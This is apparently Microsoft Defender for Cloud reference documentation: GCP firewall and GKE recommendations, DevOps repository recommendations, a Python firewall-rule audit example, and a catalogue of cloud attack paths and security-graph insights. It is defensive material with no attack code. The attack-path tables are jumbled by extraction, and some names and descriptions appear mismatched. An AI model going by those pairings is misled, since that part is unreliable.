Severity: Low

Recommendation: Firewall should not be configured to have an open NETBIOS port that allows generic access

Description: This recommendation evaluates the allowed property in firewall metadata for the following protocols and ports: TCP:137-139 and UDP:137-139.

Severity: Low

Recommendation: Firewall should not be configured to have an open ORACLEDB port that allows generic access

Description: This recommendation evaluates the allowed property in firewall metadata for the following protocols and ports: TCP:1521, 2483-2484 and UDP:2483-2484.

Severity: Low


Recommendation: Firewall should not be configured to have an open POP3 port that allows generic access
Description: This recommendation evaluates the allowed property in firewall metadata for the following protocol and port: TCP:110.
Severity: Low

Recommendation: Firewall should not be configured to have an open PostgreSQL port that allows generic access
Description: This recommendation evaluates the allowed property in firewall metadata for the following protocols and ports: TCP:5432 and UDP:5432.
Severity: Low

Recommendation: Firewall should not be configured to have an open REDIS port that allows generic access
Description: This recommendation evaluates whether the allowed property in firewall metadata contains the following protocol and port: TCP:6379.
Severity: Low

Recommendation: Firewall should not be configured to have an open SMTP port that allows generic access
Description: This recommendation evaluates whether the allowed property in firewall metadata contains the following protocol and port: TCP:25.
Severity: Low

Recommendation: Firewall should not be configured to have an open SSH port that allows generic access
Description: This recommendation evaluates whether the allowed property in firewall metadata contains the following protocols and ports: TCP:22 and SCTP:22.
Severity: Low

Recommendation: Firewall should not be configured to have an open TELNET port that allows generic access
Description: This recommendation evaluates whether the allowed property in firewall metadata contains the following protocol and port: TCP:23.
Severity: Low

Recommendation: GKE clusters should have alias IP ranges enabled
Description: This recommendation evaluates whether the useIPAliases field of the ipAllocationPolicy in a cluster is set to false.
Severity: Low

Recommendation: GKE clusters should have Private clusters enabled
Description: This recommendation evaluates whether the enablePrivateNodes field of the privateClusterConfig property is set to false.
Severity: High

Recommendation: Network policy should be enabled on GKE clusters
Description: This recommendation evaluates the networkPolicy field of the addonsConfig property for the key-value pair, 'disabled': true.
Severity: Medium
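The "open port that allows generic access" recommendations above all reduce to the same check on a firewall rule's allowed property. The following is an added example, not Microsoft's implementation: a Python audit that applies the page's protocol/port list to a GCP firewall rule in Compute API shape (allowed[].IPProtocol, allowed[].ports, sourceRanges, direction, disabled). It assumes "generic access" means an enabled INGRESS rule whose sourceRanges include 0.0.0.0/0 or ::/0, which the page does not define, and the sample rules are constructed.

```python
"""Flag GCP firewall rules that open the page's listed ports to generic sources.

Added example, not Microsoft Defender for Cloud code. Assumptions (labelled):
  * "generic access" = enabled INGRESS rule with 0.0.0.0/0 or ::/0 in sourceRanges;
  * rule dicts follow the Compute API firewall resource shape.
"""
from typing import Dict, List, Tuple

PortRange = Tuple[int, int]

# Protocol/port sets exactly as the recommendations on this page list them.
FLAGGED_SERVICES: Dict[str, Dict[str, List[PortRange]]] = {
    "NetBIOS":    {"tcp": [(137, 139)], "udp": [(137, 139)]},
    "Oracle":     {"tcp": [(1521, 1521), (2483, 2484)], "udp": [(2483, 2484)]},
    "POP3":       {"tcp": [(110, 110)]},
    "PostgreSQL": {"tcp": [(5432, 5432)], "udp": [(5432, 5432)]},
    "REDIS":      {"tcp": [(6379, 6379)]},
    "SMTP":       {"tcp": [(25, 25)]},
    "SSH":        {"tcp": [(22, 22)], "sctp": [(22, 22)]},
    "TELNET":     {"tcp": [(23, 23)]},
}

# Assumption: these source ranges are what "generic access" means.
GENERIC_SOURCES = {"0.0.0.0/0", "::/0"}


def parse_port(spec: str) -> PortRange:
    """'22' -> (22, 22); '137-139' -> (137, 139). Rejects bad or reversed ranges."""
    lo, _, hi = spec.partition("-")
    lo_i = int(lo)
    hi_i = int(hi) if hi else lo_i
    if not 0 <= lo_i <= hi_i <= 65535:
        raise ValueError(f"bad port spec {spec!r}")
    return lo_i, hi_i


def ranges_overlap(a: PortRange, b: PortRange) -> bool:
    """Closed-interval overlap test."""
    return a[0] <= b[1] and b[0] <= a[1]


def allows_generic_access(rule: dict) -> bool:
    """True for an enabled ingress rule whose sources cover the whole internet."""
    if rule.get("disabled", False):
        return False
    if rule.get("direction", "INGRESS") != "INGRESS":
        return False
    return any(src in GENERIC_SOURCES for src in rule.get("sourceRanges", []))


def flagged_services(rule: dict) -> List[str]:
    """Names of the page's flagged services that this rule exposes generically."""
    if not allows_generic_access(rule):
        return []
    hits = set()
    for entry in rule.get("allowed", []):
        proto = entry.get("IPProtocol", "").lower()
        ports = entry.get("ports")  # absent or empty means every port of the protocol
        opened = [parse_port(p) for p in ports] if ports else [(0, 65535)]
        for service, by_proto in FLAGGED_SERVICES.items():
            for svc_proto, svc_ranges in by_proto.items():
                if proto not in ("all", svc_proto):
                    continue
                if any(ranges_overlap(o, r) for o in opened for r in svc_ranges):
                    hits.add(service)
    return sorted(hits)


# Constructed sample rules (not real project data).
SAMPLE_RULES = [
    {"name": "allow-ssh-netbios-any", "direction": "INGRESS",
     "sourceRanges": ["0.0.0.0/0"],
     "allowed": [{"IPProtocol": "tcp", "ports": ["22", "137-139"]}]},
    {"name": "allow-pg-corp", "direction": "INGRESS",
     "sourceRanges": ["10.0.0.0/8"],          # not generic: corporate range only
     "allowed": [{"IPProtocol": "tcp", "ports": ["5432"]}]},
    {"name": "allow-all-any-disabled", "direction": "INGRESS", "disabled": True,
     "sourceRanges": ["0.0.0.0/0"], "allowed": [{"IPProtocol": "all"}]},
]


def audit(rules: List[dict]) -> Dict[str, List[str]]:
    """Map rule name -> flagged services, omitting rules with no finding."""
    return {r["name"]: s for r in rules if (s := flagged_services(r))}


if __name__ == "__main__":
    for name, services in audit(SAMPLE_RULES).items():
        print(f"{name}: generically open for {', '.join(services)}")
```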


Next steps

For related information, see the following:

• Connect your GCP projects to Microsoft Defender for Cloud
• What are security policies, initiatives, and recommendations?
• Review your security recommendations


Security recommendations for DevOps resources - a reference guide

Article • 09/27/2023

This article lists the recommendations you might see in Microsoft Defender for Cloud if you've connected an Azure DevOps or GitHub environment from the Environment settings page. The recommendations shown in your environment depend on the resources you're protecting and your customized configuration.

To learn about how to respond to these recommendations, see Remediate recommendations in Defender for Cloud.

Learn more about the benefits and features of Defender for DevOps.

DevOps recommendations do not currently affect the Secure Score. To prioritize recommendations, consider the number of impacted resources, the total number of findings and the level of severity.


DevOps recommendations

Recommendation: (Preview) Azure DevOps repositories should have GitHub Advanced Security for Azure DevOps (GHAzDO) enabled
Description: Defender for DevOps uses a central console to empower security teams with the ability to protect applications and resources from code to cloud across Azure DevOps. With GitHub Advanced Security for Azure DevOps (GHAzDO) enabled on your Azure DevOps repositories, you get findings about secrets, dependencies and code vulnerabilities in those repositories surfaced in Microsoft Defender for Cloud.
Severity: High

Recommendation: (Preview) Azure DevOps repositories should have dependency vulnerability scanning findings resolved
Description: Dependency vulnerabilities have been found in code repositories. To improve the security posture of the repositories, it is highly recommended to remediate these vulnerabilities.
Severity: Medium

Recommendation: (Preview) Azure DevOps repositories should have Infrastructure as code scanning findings resolved
Description: Infrastructure as code security configuration issues have been found in repositories. The issues shown below have been detected in template files. To improve the security posture of the related cloud resources, it is highly recommended to remediate these issues.
Severity: Medium

Recommendation: (Preview) Azure DevOps repositories should have code scanning findings resolved
Description: Vulnerabilities have been found in code repositories. To improve the security posture of the repositories, it is highly recommended to remediate these vulnerabilities.
Severity: Medium

Recommendation: (Preview) Azure DevOps repositories should have secret scanning findings resolved
Description: Secrets have been found in code repositories. This should be remediated immediately to prevent a security breach. Secrets found in repositories can be leaked or discovered by adversaries, leading to compromise of an application or service. Note: The Microsoft Security DevOps credential scanning tool only scans builds on which it has been configured to run. Therefore, results may not reflect the complete status of secrets in your repositories.
Severity: High

Recommendation: (Preview) GitHub repositories should have infrastructure as code scanning findings resolved
Description: Infrastructure as code security configuration issues have been found in repositories. The issues shown below have been detected in template files. To improve the security posture of the related cloud resources, it is highly recommended to remediate these issues.
Severity: Medium

Recommendation: (Preview) GitHub repositories should have code scanning findings resolved
Description: Vulnerabilities have been found in code repositories. To improve the security posture of the repositories, it is highly recommended to remediate these vulnerabilities.
Severity: Medium

Recommendation: (Preview) GitHub repositories should have dependency vulnerability scanning findings resolved
Description: GitHub repositories should have dependency vulnerability scanning findings resolved.
Severity: Medium

Recommendation: (Preview) GitHub repositories should have secret scanning findings resolved
Description: Secrets have been found in code repositories. This should be remediated immediately to prevent a security breach. Secrets found in repositories can be leaked or discovered by adversaries, leading to compromise of an application or service.
Severity: High

Recommendation: (Preview) GitHub repositories should have code scanning enabled
Description: GitHub uses code scanning to analyze code in order to find security vulnerabilities and errors in code. Code scanning can be used to find, triage, and prioritize fixes for existing problems in your code. Code scanning can also prevent developers from introducing new problems. Scans can be scheduled for specific days and times, or scans can be triggered when a specific event occurs in the repository, such as a push. If code scanning finds a potential vulnerability or error in code, GitHub displays an alert in the repository. A vulnerability is a problem in a project's code that could be exploited to damage the confidentiality, integrity, or availability of the project.
Severity: Medium

Recommendation: (Preview) GitHub repositories should have Dependabot scanning enabled
Description: GitHub sends Dependabot alerts when it detects vulnerabilities in code dependencies that affect repositories. A vulnerability is a problem in a project's code that could be exploited to damage the confidentiality, integrity, or availability of the project or other projects that use its code. Vulnerabilities vary in type, severity, and method of attack. When code depends on a package that has a security vulnerability, this vulnerable dependency can cause a range of problems.
Severity: Medium

Recommendation: (Preview) GitHub repositories should have secret scanning enabled
Description: GitHub scans repositories for known types of secrets, to prevent fraudulent use of secrets that were accidentally committed to repositories. Secret scanning will scan the entire Git history on all branches present in the GitHub repository for any secrets. Examples of secrets are tokens and private keys that a service provider can issue for authentication. If a secret is checked into a repository, anyone who has read access to the repository can use the secret to access the external service with those privileges. Secrets should be stored in a dedicated, secure location outside the repository for the project.
Severity: High

Deprecated recommendations

Recommendation: Code repositories should have code scanning findings resolved
Description: Defender for DevOps has found vulnerabilities in code repositories. To improve the security posture of the repositories, it is highly recommended to remediate these vulnerabilities. (No related policy)
Severity: Medium

Recommendation: Code repositories should have secret scanning findings resolved
Description: Defender for DevOps has found a secret in code repositories. This should be remediated immediately to prevent a security breach. Secrets found in repositories can be leaked or discovered by adversaries, leading to compromise of an application or service. For Azure DevOps, the Microsoft Security DevOps CredScan tool only scans builds on which it has been configured to run. Therefore, results may not reflect the complete status of secrets in your repositories. (No related policy)
Severity: High

Recommendation: Code repositories should have Dependabot scanning findings resolved
Description: Defender for DevOps has found vulnerabilities in code repositories. To improve the security posture of the repositories, it is highly recommended to remediate these vulnerabilities. (No related policy)
Severity: Medium

Recommendation: Code repositories should have infrastructure as code scanning findings resolved
Description: Defender for DevOps has found infrastructure as code security configuration issues in repositories. The issues shown below have been detected in template files. To improve the security posture of the related cloud resources, it is highly recommended to remediate these issues. (No related policy)
Severity: Medium

Recommendation: GitHub repositories should have code scanning enabled
Description: GitHub uses code scanning to analyze code in order to find security vulnerabilities and errors in code. Code scanning can be used to find, triage, and prioritize fixes for existing problems in your code. Code scanning can also prevent developers from introducing new problems. Scans can be scheduled for specific days and times, or scans can be triggered when a specific event occurs in the repository, such as a push. If code scanning finds a potential vulnerability or error in code, GitHub displays an alert in the repository. A vulnerability is a problem in a project's code that could be exploited to damage the confidentiality, integrity, or availability of the project. (No related policy)
Severity: Medium

Recommendation: GitHub repositories should have secret scanning enabled
Description: GitHub scans repositories for known types of secrets, to prevent fraudulent use of secrets that were accidentally committed to repositories. Secret scanning will scan the entire Git history on all branches present in the GitHub repository for any secrets. Examples of secrets are tokens and private keys that a service provider can issue for authentication. If a secret is checked into a repository, anyone who has read access to the repository can use the secret to access the external service with those privileges. Secrets should be stored in a dedicated, secure location outside the repository for the project. (No related policy)
Severity: High

Recommendation: GitHub repositories should have Dependabot scanning enabled
Description: GitHub sends Dependabot alerts when it detects vulnerabilities in code dependencies that affect repositories. A vulnerability is a problem in a project's code that could be exploited to damage the confidentiality, integrity, or availability of the project or other projects that use its code. Vulnerabilities vary in type, severity, and method of attack. When code depends on a package that has a security vulnerability, this vulnerable dependency can cause a range of problems. (No related policy)
Severity: Medium

Next steps

To learn more about recommendations, see the following:

• What are security policies, initiatives, and recommendations?
• Review your security recommendations


Reference list of attack paths and cloud security graph components

Article • 09/05/2023

This article lists the attack paths, connections, and insights used in Defender Cloud Security Posture Management (CSPM).

• You need to enable Defender CSPM to view attack paths.
• What you see in your environment depends on the resources you're protecting, and your customized configuration.

Learn more about the cloud security graph, attack path analysis, and the cloud security explorer.

Attack paths

Azure VMs

Prerequisite: For a list of prerequisites, see the Availability table for attack paths.


Attack path display name Attack path description 

Internet exposed VM has high severity A virtual machine is reachable from the internet and 
vulnerabilities has high severity vulnerabilities. 

Internet exposed VM has high severity A virtual machine is reachable from the internet, has 
vulnerabilities and high permission to a high severity vulnerabilities, and identity and 
subscription permission to a subscription. 

Internet exposed VM has high severity A virtual machine is reachable from the internet, has 
vulnerabilities and read permission to a high severity vulnerabilities and read permission to a 
data store with sensitive data data store containing sensitive data. 


Prerequisite: Enable data-aware security for storage 
accounts in Defender CSPM, or leverage Microsoft 
Purview Data Catalog to protect sensitive data. 


Internet exposed VM has high severity A virtual machine is reachable from the internet and 
vulnerabilities and read permission to a has high severity vulnerabilities and read permission 
data store to a data store. 

Internet exposed VM has high severity A virtual machine is reachable from the internet and 
vulnerabilities and read permission to a has high severity vulnerabilities and read permission 


Key Vault to a key vault. 


Attack path display name 


VM has high severity vulnerabilities and 
high permission to a subscription 


VM has high severity vulnerabilities and 
read permission to a data store with 
sensitive data 


VM has high severity vulnerabilities and 
read permission to a key vault 


VM has high severity vulnerabilities and 
read permission to a data store 


Internet exposed VM has high severity 
vulnerability and insecure SSH private 
key that can authenticate to another VM 


Internet exposed VM has high severity 
vulnerabilities and has insecure secret 
that is used to authenticate to a SQL 
server 


VM has high severity vulnerabilities and 
has insecure secret that is used to 
authenticate to a SQL server 


VM has high severity vulnerabilities and 
has insecure plaintext secret that is used 
to authenticate to storage account 


Internet exposed VM has high severity 
vulnerabilities and has insecure secret 
that is used to authenticate to storage 
account 


AWS EC2 instances 


Prerequisite: Enable agentless scanning. 


Attack path display name 


Internet exposed EC2 instance has high 
severity vulnerabilities and high 


Attack path description 


A virtual machine has high severity vulnerabilities and 
has high permission to a subscription. 


A virtual machine has high severity vulnerabilities and 
read permission to a data store containing sensitive 
data. 

Prerequisite: Enable data-aware security for storage 
accounts in Defender CSPM, or leverage Microsoft 
Purview Data Catalog to protect sensitive data. 


A virtual machine has high severity vulnerabilities and 
read permission to a key vault. 


A virtual machine has high severity vulnerabilities and 
read permission to a data store. 


An Azure virtual machine is reachable from the 
internet, has high severity vulnerabilities and has 
plaintext SSH private key that can authenticate to 
another AWS EC2 instance 


An Azure virtual machine is reachable from the 
internet, has high severity vulnerabilities and has 
plaintext SSH private key that can authenticate to an 
SQL server 


An Azure virtual machine has high severity 
vulnerabilities and has plaintext SSH private key that 
can authenticate to an SQL server 


An Azure virtual machine has high severity 
vulnerabilities and has plaintext SSH private key that 
can authenticate to an Azure storage account 


An Azure virtual machine is reachable from the 
internet, has high severity vulnerabilities and has 
secret that can authenticate to an Azure storage 
account 


Attack path description 


An AWS EC2 instance is reachable from the internet, 
has high severity vulnerabilities and has permission to 


Attack path display name 


permission to an account 


Internet exposed EC2 instance has high 
severity vulnerabilities and read 
permission to a DB 


Internet exposed EC2 instance has high 
severity vulnerabilities and read 
permission to S3 bucket 


Internet exposed EC2 instance has high 
severity vulnerabilities and read 
permission to a S3 bucket with sensitive 
data 


Internet exposed EC2 instance has high 
severity vulnerabilities and read 
permission to a KMS 


Internet exposed EC2 instance has high 
severity vulnerabilities 


EC2 instance with high severity 
vulnerabilities has high privileged 
permissions to an account 


EC2 instance with high severity 
vulnerabilities has read permissions to a 
data store 


EC2 instance with high severity 
vulnerabilities has read permissions to a 
data store with sensitive data 


Attack path description 


an account. 


An AWS EC2 instance is reachable from the internet, 
has high severity vulnerabilities and has permission to 
a database. 


An AWS EC2 instance is reachable from the internet, 
has high severity vulnerabilities and has an IAM role 
attached with permission to an S3 bucket via an IAM 
policy, or via a bucket policy, or via both an IAM 
policy and a bucket policy. 


An AWS EC2 instance is reachable from the internet 
has high severity vulnerabilities and has an IAM role 
attached with permission to an S3 bucket containing 
sensitive data via an IAM policy, or via a bucket 
policy, or via both an IAM policy and bucket policy. 
Prerequisite: Enable data-aware security for S3 
buckets in Defender CSPM, or leverage Microsoft 
Purview Data Catalog to protect sensitive data. 


An AWS EC2 instance is reachable from the internet, 
has high severity vulnerabilities and has an IAM role 
attached with permission to an AWS Key 
Management Service (KMS) via an IAM policy, or via 
an AWS Key Management Service (KMS) policy, or via 
both an IAM policy and an AWS KMS policy. 


An AWS EC2 instance is reachable from the internet 
and has high severity vulnerabilities. 


An AWS EC2 instance has high severity vulnerabilities 
and has permissions to an account. 


An AWS EC2 instance has high severity vulnerabilities 
and has an IAM role attached which is granted with 

permissions to an S3 bucket via an IAM policy or via a 
bucket policy, or via both an IAM policy and a bucket 


policy. 


An AWS EC2 instance has high severity vulnerabilities 
and has an IAM role attached which is granted with 
permissions to an S3 bucket containing sensitive data 
via an IAM policy or via a bucket policy, or via both an 
IAM and bucket policy. 

Prerequisite: Enable data-aware security for S3 
buckets in Defender CSPM, or leverage Microsoft 
Purview Data Catalog to protect sensitive data. 


Attack path display name 


EC2 instance with high severity 
vulnerabilities has read permissions to a 
KMS key 


Internet exposed EC2 instance has high 
severity vulnerability and insecure SSH 
private key that can authenticate to 
another AWS EC2 instance 


Internet exposed EC2 instance has high 
severity vulnerabilities and has insecure 
secret that is used to authenticate to a 
RDS resource 


EC2 instance has high severity 
vulnerabilities and has insecure plaintext 
secret that is used to authenticate to a 
RDS resource 


Internet exposed AWS EC2 instance has 
high severity vulnerabilities and has 
insecure secret that has permission to S3 
bucket via an IAM policy, or via a bucket 
policy, or via both an IAM policy and a 
bucket policy. 


GCP VM Instances 


Attack path description 


An AWS EC2 instance has high severity vulnerabilities 
and has an IAM role attached which is granted with 
permissions to an AWS Key Management Service 
(KMS) key via an IAM policy, or via an AWS Key 
Management Service (KMS) policy, or via both an IAM 
and AWS KMS policy. 


An AWS EC2 instance is reachable from the internet, 
has high severity vulnerabilities and has plaintext SSH 
private key that can authenticate to another AWS EC2 
instance 


An AWS EC2 instance is reachable from the internet, 
has high severity vulnerabilities and has plaintext SSH 
private key that can authenticate to an AWS RDS 
resource 


An AWS EC2 instance has high severity vulnerabilities 
and has plaintext SSH private key that can 
authenticate to an AWS RDS resource 


An AWS EC2 instance is reachable from the internet, 
has high severity vulnerabilities and has insecure 
secret that has permissions to S3 bucket via an IAM 
policy, a bucket policy or both 


Attack path display name 


Internet exposed VM instance 
has high severity vulnerabilities 


Internet exposed VM instance 
with high severity 
vulnerabilities has read 
permissions to a data store 


Internet exposed VM instance 
with high severity 
vulnerabilities has read 
permissions to a data store 
with sensitive data 


Attack path description 


GCP VM instance '[VMInstanceName]’ is reachable from the 
internet and has high severity vulnerabilities [Remote Code 
Execution]. 


GCP VM instance '[VMInstanceName]’ is reachable from the 
internet, has high severity vulnerabilities[Remote Code 
Execution] and has read permissions to a data store. 


GCP VM instance '[VMInstanceName]’ is reachable from the 
internet, has high severity vulnerabilities allowing remote code 
execution on the machine and assigned with Service Account 
with read permission to GCP Storage bucket ‘[BucketName]' 
containing sensitive data. 


Attack path display name 


Internet exposed VM instance 
has high severity vulnerabilities 
and high permission to a 
project 


Internet exposed VM instance 
with high severity 
vulnerabilities has read 
permissions to a Secret 
Manager 


Internet exposed VM instance 
has high severity vulnerabilities 
and a hosted database 
installed 


Internet exposed VM with high 
severity vulnerabilities has 
plaintext SSH private key 


VM instance with high severity 
vulnerabilities has read 
permissions to a data store 


VM instance with high severity 
vulnerabilities has read 
permissions to a data store 
with sensitive data 


VM instance has high severity 
vulnerabilities and high 
permission to a project 


VM instance with high severity 
vulnerabilities has read 
permissions to a Secret 
Manager 


VM instance with high severity 
vulnerabilities has plaintext 
SSH private key 


Azure data 


Attack path description 


GCP VM instance '[VMInstanceName]’ is reachable from the 
internet, has high severity vulnerabilities[Remote Code 
Execution] and has ‘[Permissions]' permission to project 
‘[ProjectName]’. 


GCP VM instance '[VMInstanceName]’ is reachable from the 
internet, has high severity vulnerabilities[Remote Code 

Execution] and has read permissions through IAM policy to GCP 
Secret Manager's secret '[SecretName]'. 


GCP VM instance '[VMInstanceName]' with a hosted 
[DatabaseType] database is reachable from the internet and has 
high severity vulnerabilities. 


GCP VM instance '[MachineName]' is reachable from the 
internet, has high severity vulnerabilities [Remote Code 
Execution] and has plaintext SSH private key [SSHPrivateKey]. 


GCP VM instance '[VMInstanceName]' has high severity 
vulnerabilities[Remote Code Execution] and has read 
permissions to a data store. 


GCP VM instance '[VMInstanceName]' has high severity 
vulnerabilities [Remote Code Execution] and has read 
permissions to GCP Storage bucket ‘[BucketName]' containing 
sensitive data. 


GCP VM instance '[VMInstanceName]' has high severity 
vulnerabilities[Remote Code Execution] and has ‘[Permissions]' 
permission to project ‘[ProjectName]'. 


GCP VM instance '[VMInstanceName]' has high severity 
vulnerabilities[Remote Code Execution] and has read 

permissions through IAM policy to GCP Secret Manager's secret 
‘[SecretName]'. 


GCP VM instance to align with all other attack paths. Virtual 
machine ‘[MachineName]' has high severity vulnerabilities 
[Remote Code Execution] and has plaintext SSH private key 
[SSHPrivateKey]. 


Attack path display name 


Internet exposed SQL on VM has a 
user account with commonly used 
username and allows code execution 
on the VM (Preview) 


Internet exposed SQL on VM has a 
user account with commonly used 
username and known vulnerabilities 
(Preview) 


SQL on VM has a user account with 
commonly used username and allows 
code execution on the VM (Preview) 


SQL on VM has a user account with 
commonly used username and 
known vulnerabilities (Preview) 


Managed database with excessive 
internet exposure allows basic (local 
user/password) authentication 
(Preview) 


Managed database with excessive 
internet exposure and sensitive data 
allows basic (local user/password) 
authentication (Preview) 


Internet exposed managed database 
with sensitive data allows basic (local 
user/password) authentication 
(Preview) 


Internet exposed VM has high 
severity vulnerabilities and a hosted 
database installed (Preview) 


Attack path description 


SQL on VM is reachable from the internet, has a local 
user account with a commonly used username (which is 
prone to brute force attacks), and has vulnerabilities 
allowing code execution and lateral movement to the 
underlying VM. 

Prerequisite: Enable Microsoft Defender for SQL servers 
on machines 


SQL on VM is reachable from the internet, has a local 
user account with a commonly used username (which is 
prone to brute force attacks), and has known 
vulnerabilities (CVEs). 

Prerequisite: Enable Microsoft Defender for SQL servers 
on machines 


SQL on VM has a local user account with a commonly 
used username (which is prone to brute force attacks), 
and has vulnerabilities allowing code execution and 
lateral movement to the underlying VM. 

Prerequisite: Enable Microsoft Defender for SQL servers 
on machines 


SQL on VM has a local user account with a commonly 
used username (which is prone to brute force attacks), 
and has known vulnerabilities (CVEs). 

Prerequisite: Enable Microsoft Defender for SQL servers 
on machines 


The database can be accessed through the internet from 
any public IP and allows authentication using username 
and password (basic authentication mechanism) which 
exposes the DB to brute force attacks. 


The database can be accessed through the internet from 
any public IP and allows authentication using username 
and password (basic authentication mechanism) which 
exposes a DB with sensitive data to brute force attacks. 


The database can be accessed through the internet from 
specific IPs or IP ranges and allows authentication using 
username and password (basic authentication 
mechanism) which exposes a DB with sensitive data to 
brute force attacks. 


An attacker with network access to the DB machine can 
exploit the vulnerabilities and gain remote code 
execution. 


Attack path display name 


Private Azure blob storage container 
replicates data to internet exposed 
and publicly accessible Azure blob 
storage container 


Internet exposed Azure Blob Storage 
container with sensitive data is 
publicly accessible 


AWS data 


Attack path display name 


Internet exposed AWS S3 Bucket with 
sensitive data is publicly accessible 


Internet exposed SQL on EC2 instance 
has a user account with commonly 
used username and allows code 
execution on the underlying compute 
(Preview) 


Internet exposed SQL on EC2 instance 
has a user account with commonly 
used username and known 
vulnerabilities (Preview) 


SQL on EC2 instance has a user 
account with commonly used 
username and allows code execution 
on the underlying compute (Preview) 


SQL on EC2 instance has a user 
account with commonly used 
username and known vulnerabilities 
(Preview) 


Attack path description 


An internal Azure storage container replicates its data to 
another Azure storage container thatis reachable from 
the internet and allows public access, and poses this data 
at risk. 


A blob storage account container with sensitive data is 
reachable from the internet and allows public read access 
without authorization required. 

Prerequisite: Enable data-aware security for storage 
accounts in Defender CSPM. 


Attack path description 


An S3 bucket with sensitive data is reachable from the 
internet and allows public read access without 
authorization required. 

Prerequisite: Enable data-aware security for S3 buckets 
in Defender CSPM, or leverage Microsoft Purview Data 
Catalog to protect sensitive data. 


Internet exposed SQL on EC2 instance has a user 
account with commonly used username and allows code 
execution on the underlying compute. 

Prerequisite: Enable Microsoft Defender for SQL servers 
on machines. 


SQL on EC2 instance is reachable from the internet, has a 
local user account with a commonly used username 
(which is prone to brute force attacks), and has known 
vulnerabilities (CVEs). 

Prerequisite: Enable Microsoft Defender for SQL servers 
on machines 


SQL on EC2 instance has a local user account with 
commonly used username (which is prone to brute force 
attacks), and has vulnerabilities allowing code execution 
and lateral movement to the underlying compute. 
Prerequisite: Enable Microsoft Defender for SQL servers 
on machines 


SQL on EC2 instance [EC2Name] has a local user account 
with commonly used username (which is prone to brute 
force attacks), and has known vulnerabilities (CVEs). 


Attack path display name 


Managed database with excessive 
internet exposure allows basic (local 
user/password) authentication 
(Preview) 


Managed database with excessive 
internet exposure and sensitive data 
allows basic (local user/password) 
authentication (Preview) 


Internet exposed managed database 
with sensitive data allows basic (local 
user/password) authentication 
(Preview) 


Internet exposed EC2 instance has 
high severity vulnerabilities and a 
hosted database installed (Preview) 


Private AWS S3 bucket replicates data 
to internet exposed and publicly 
accessible AWS S3 bucket 


RDS snapshot is publicly available to 
all AWS accounts (Preview) 


Internet exposed SQL on EC2 instance 
has a user account with commonly 
used username and allows code 
execution on the underlying compute 
(Preview) 


Internet exposed SQL on EC2 instance 
has a user account with commonly 
used username and known 
vulnerabilities (Preview) 


SQL on EC2 instance has a user 
account with commonly used 
username and allows code execution 
on the underlying compute (Preview) 


SQL on EC2 instance has a user 
account with commonly used 


Attack path description 


Prerequisite: Enable Microsoft Defender for SQL servers on machines.

Attack path description

- The database can be accessed through the internet from any public IP and allows authentication using username and password (basic authentication mechanism), which exposes the DB to brute force attacks.
- The database can be accessed through the internet from any public IP and allows authentication using username and password (basic authentication mechanism), which exposes a DB with sensitive data to brute force attacks.
- The database can be accessed through the internet from specific IPs or IP ranges and allows authentication using username and password (basic authentication mechanism), which exposes a DB with sensitive data to brute force attacks.
- An attacker with network access to the DB machine can exploit the vulnerabilities and gain remote code execution.
- An internal AWS S3 bucket replicates its data to another S3 bucket which is reachable from the internet and allows public access, and puts this data at risk.
- A snapshot of an RDS instance or cluster is publicly accessible by all AWS accounts.
- SQL on EC2 instance is reachable from the internet, has a local user account with a commonly used username (which is prone to brute force attacks), and has vulnerabilities allowing code execution and lateral movement to the underlying compute.
- SQL on EC2 instance is reachable from the internet, has a local user account with a commonly used username (which is prone to brute force attacks), and has known vulnerabilities (CVEs).
- SQL on EC2 instance has a local user account with a commonly used username (which is prone to brute force attacks), and has vulnerabilities allowing code execution and lateral movement to the underlying compute.

| Attack path display name | Attack path description |
|---|---|
| username and known vulnerabilities (Preview) | SQL on EC2 instance has a local user account with a commonly used username (which is prone to brute force attacks), and has known vulnerabilities (CVEs). |
| Private AWS S3 bucket replicates data to internet exposed and publicly accessible AWS S3 bucket | Private AWS S3 bucket is replicating data to internet exposed and publicly accessible AWS S3 bucket |
| Private AWS S3 bucket with sensitive data replicates data to internet exposed and publicly accessible AWS S3 bucket | Private AWS S3 bucket with sensitive data is replicating data to internet exposed and publicly accessible AWS S3 bucket |
| RDS snapshot is publicly available to all AWS accounts (Preview) | RDS snapshot is publicly available to all AWS accounts |

GCP data

| Attack path display name | Attack path description |
|---|---|
| GCP Storage Bucket with sensitive data is publicly accessible | GCP Storage Bucket [BucketName] with sensitive data allows public read access without authorization required. |


Azure containers

Prerequisite: Enable agentless container posture. This will also give you the ability to query containers data plane workloads in security explorer.

| Attack path display name | Attack path description |
|---|---|
| Internet exposed Kubernetes pod is running a container with RCE vulnerabilities | An internet exposed Kubernetes pod in a namespace is running a container using an image that has vulnerabilities allowing remote code execution. |
| Kubernetes pod running on an internet exposed node uses host network is running a container with RCE vulnerabilities | A Kubernetes pod in a namespace with host network access enabled is exposed to the internet via the host network. The pod is running a container using an image that has vulnerabilities allowing remote code execution. |

GitHub repositories

Prerequisite: Enable Defender for DevOps.

| Attack path display name | Attack path description |
|---|---|
| Internet exposed GitHub repository with plaintext secret is publicly accessible (Preview) | A GitHub repository is reachable from the internet, allows public read access without authorization required, and holds plaintext secrets. |


Cloud security graph components list

This section lists all of the cloud security graph components (connections and insights) that can be used in queries with the cloud security explorer.

Insights

| Insight | Description | Supported entities |
|---|---|---|
| Exposed to the internet | Indicates that a resource is exposed to the internet. Supports port filtering. Learn more | Azure virtual machine, AWS EC2, Azure storage account, Azure SQL server, Azure Cosmos DB, AWS S3, Kubernetes pod, Azure SQL Managed Instance, Azure MySQL Single Server, Azure MySQL Flexible Server, Azure PostgreSQL Single Server, Azure PostgreSQL Flexible Server, Azure MariaDB Single Server, Synapse Workspace, RDS Instance, GCP VM instance, GCP SQL admin instance |
| Allows basic authentication (Preview) | Indicates that a resource allows basic (local user/password or key-based) authentication | Azure SQL Server, RDS Instance, Azure MariaDB Single Server, Azure MySQL Single Server, Azure MySQL Flexible Server, Synapse Workspace, Azure PostgreSQL Single Server, Azure SQL Managed Instance |
